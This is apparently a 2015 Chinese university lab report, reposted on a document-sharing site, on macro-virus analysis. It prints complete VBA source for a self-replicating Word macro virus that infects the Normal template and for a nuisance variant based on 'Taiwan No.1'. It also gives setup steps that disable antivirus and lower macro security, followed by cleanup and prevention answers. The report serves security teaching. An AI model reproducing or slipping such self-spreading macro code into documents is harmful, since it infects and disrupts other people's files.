012194信安1202李自然实验六宏病毒分析与实践.docx
- 文档编号:323067
- 上传时间:2023-04-28
- 格式:DOCX
- 页数:13
- 大小:794.71KB
012194信安1202李自然实验六宏病毒分析与实践.docx
《012194信安1202李自然实验六宏病毒分析与实践.docx》由会员分享,可在线阅读,更多相关《012194信安1202李自然实验六宏病毒分析与实践.docx(13页珍藏版)》请在冰点文库上搜索。
012194信安1202李自然实验六宏病毒分析与实践
北京信息科技大学
信息管理学院
课程设计报告
课程名称《计算机病毒分析与防范》课程设计
题目宏病毒的分析与实践
指导教师孙璇
设计起止日期2015年5月18日
系别信息管理学院
专业信息安全
学生姓名 李自然
班级/学号 信安1202/2012012194
成绩
北京信息科技大学
信息管理学院
(课程设计)实验报告
实验名称
宏病毒的分析与实践
实验地点
3-607
实验时间
15.5.18
1.课程设计目的:
Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
2.课程设计内容:
1.软件设置
关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visualbasic项目的访问”。
注意:
为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
2.宏的制作
●录制宏
宏名是“表格插入”,其作用是自动插入一个4x4的表格,通过快捷键CTRL+J或者“表格”菜单下子菜单“表格插入”,都能完成操作。
3.自我复制功能演示
打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“VisualBasic宏编辑器”),在左侧的“project—>MicrosoftWord”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
实验代码:
'Macro-1:
Micro-Virus
SubDocument_Open()
OnErrorResumeNext
Application.DisplayStatusBar=False
Options.SaveNormalPrompt=False
Setourcodemodule=ThisDocument.VBProject.VBComponents
(1).CodeModule
Sethost=NormalTemplate.VBProject.VBComponents
(1).CodeModule
IfThisDocument=NormalTemplateThen
Sethost=ActiveDocument.VBProject.VBComponents
(1).CodeModule
EndIf
Withhost
If.Lines(1,1)<>"'Micro-Virus"Then
.DeleteLines1,.CountOfLines
.InsertLines1,ourcodemodule.Lines(1,100)
.ReplaceLine2,"SubDocument_Close()"
IfThisDocument=NormalTemplateThen
.ReplaceLine2,"SubDocument_Open()"
ActiveDocument.SaveAsActiveDocument.FullName
EndIf
EndIf
EndWith
MsgBox"中毒了哈哈!
"
EndSub
4.具有一定破坏性的宏
我们可以对上例中的恶意代码稍加修改,使其具有一定的破坏性(这里以著名宏病毒“台湾一号”的恶意代码部分为基础,为使其在word2000/2003版本中运行,且降低破坏性,对源代码作适当修改,参见如下源代码(Macro_2)。
完整代码如下:
'moonlight
Dimnm(4)
SubDocument_Open()
'DisableInput1
Setourcodemodule=ThisDocument.VBProject.VBComponents
(1).CodeModule
Sethost=NormalTemplate.VBProject.VBComponents
(1).CodeModule
IfThisDocument=NormalTemplateThen
Sethost=ActiveDocument.VBProject.VBComponents
(1).CodeModule
EndIf
Withhost
If.Lines(1,1)<>"'moonlight"Then
.DeleteLines1,.CountOfLines
.InsertLines1,ourcodemodule.Lines(1,100)
.ReplaceLine3,"SubDocument_Close()"
IfThisDocument=NormalTemplateThen
.ReplaceLine3,"SubDocument_Open()"
ActiveDocument.SaveAsActiveDocument.FullName
EndIf
EndIf
EndWith
Count=0
IfDay(Now())=29Then
try:
OnErrorGoTotry
test=-1
con=1
tog$=""
i=0
Whiletest=-1
Fori=0To4
nm(i)=Int(Rnd()*10)
con=con*nm(i)
Ifi=4Then
tog$=tog$+Str$(nm(4))+"=?
"
GoTobeg
EndIf
tog$=tog$+Str$(nm(i))+"*"
Nexti
beg:
Beep
ans$=InputBox$("今天是"+Date$+",跟你玩一个心算游戏"+Chr$(13)+"若你答错,只好接受震撼教育......"+Chr$(13)+tog$,"台湾NO.1MacroVirus")
IfRTrim$(LTrim$(ans$))=LTrim$(Str$(con))Then
Documents.Add
Selection.Paragraphs.Alignment=wdAlignParagraphCenter
Beep
WithSelection.Font
.Name="细明体"
.Size=16
.Bold=1
.Underline=1
EndWith
Selection.InsertAfterText:
="何谓宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfterText:
="答案:
"
Selection.Font.Italic=1
Selection.InsertAfterText:
="我就是......"
Selection.InsertParagraphAfter
Selection.InsertParagraphAfter
Selection.Font.Italic=0
Beep
Selection.InsertAfterText:
="如何预防宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfterText:
="答案:
"
Selection.Font.Italic=1
Selection.InsertAfterText:
="不要看我......"
GoToout
Else
Count=Count+1
Forj=1To20
Beep
Documents.Add
Nextj
Selection.Paragraphs.Alignment=wdAlignParagraphCenter
Selection.InsertAfterText:
="宏病毒"
IfCount=2ThenGoToout
GoTotry
EndIf
Wend
EndIf
out:
EndSub
该病毒的效果:
当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是29日(即在每月的29日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:
何谓宏病毒
答案:
我就是......
如何预防宏病毒
答案:
不要看我......
如果计算错误,新建20个写有“宏病毒”字样的word文档,然后再一次进行心算游戏,总共进行3次,然后跳出程序。
关闭文档的时候也会执行同样的询问。
5.清除宏病毒
对每一个受感染的word文档进行如下操作:
打开受感染的word文档,进入宏编辑环境(Alt+F11),打开“Normal-MicrosoftWord”对象-“ThisDocument”,清除其中的病毒代码(只要删除所有内容即可)。
然后打开“Project”中所有文档的“MicrosoftWord”“ThisDocument”,清除其中的病毒代码。
实际上,模板的病毒代码只要在处理最后一个受感染文件时清除即可,然而清除模板病毒后,如果重新打开其他已感染文件,模板将再次被感染,因此为了保证病毒被清除,可以查看每一个受感染文档的模板,如果存在病毒代码,都进行一次清除。
6.思考题
宏病毒如何实现通过某一个染毒文档的打开传播到所有的文档?
如何对Word安全性进行设置能够降低宏病毒感染的风险?
3.课程设计要求:
⏹演示宏的编写;
⏹理解宏病毒的作用机制。
4.实验条件:
⏹Windows2000/2003/XP或更高级别的Windows操作系统;
⏹OfficeWord2000/2003等字处理软件。
5.实验方法与步骤:
1.将安全级设为低,设置可靠发行商
2.宏的制作
●录制宏
宏名是“表格插入”,其作用是自动插入一个4x4的表格,通过快捷键CTRL+J或者“表格”菜单下子菜单“表格插入”,都能完成操作。
3.自我复制功能演示
再次打开
4.具有一定破坏性的宏(加入代码)
由于做实验时不是29号,为了实验效果,将日期改为29号再次打开
5.清除宏病毒
对每一个受感染的word文档进行如下操作:
打开受感染的word文档,进入宏编辑环境(Alt+F11),打开“Normal-MicrosoftWord”对象-“ThisDocument”,清除其中的病毒代码(只要删除所有内容即可)。
然后打开“Project”中所有文档的“MicrosoftWord”“ThisDocument”,清除其中的病毒代码。
答:
清除代码后,再次打开文档全部恢复正常
6.思考题
宏病毒如何实现通过某一个染毒文档的打开传播到所有的文档?
答:
感染一个文档后他会复制保存到模板中,所以当你打开其他的时候模板里面的病毒代码又会复制到新的文档中,如此而来感染其他文档
如何对Word安全性进行设置能够降低宏病毒感染的风险?
答:
将宏设置为安全等级高或者最高,并且不要信任visualbasic,这样就不可轻易感染
6.实验总结:
通过这次实验,我大概了解了宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高了自我防范意识!
!
!
说明:
1.课程名称、课程设计目的、课程设计内容、课程设计要求由教师确定,实验前由教师事先填好,然后作为实验报告模版供学生使用;
2.实验条件由学生在实验或上机之前填写,教师应该在实验前检查并指导;
3.实验过程由学生记录实验的过程,包括操作过程、遇到哪些问题以及如何解决等;
4.实验总结由学生在实验后填写,总结本次实验的收获、未解决的问题以及体会和建议等;
5.源程序、代码、具体语句等,若表格空间不足时可作为附录另外附页。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 012194 1202 自然 实验 宏病毒 分析 实践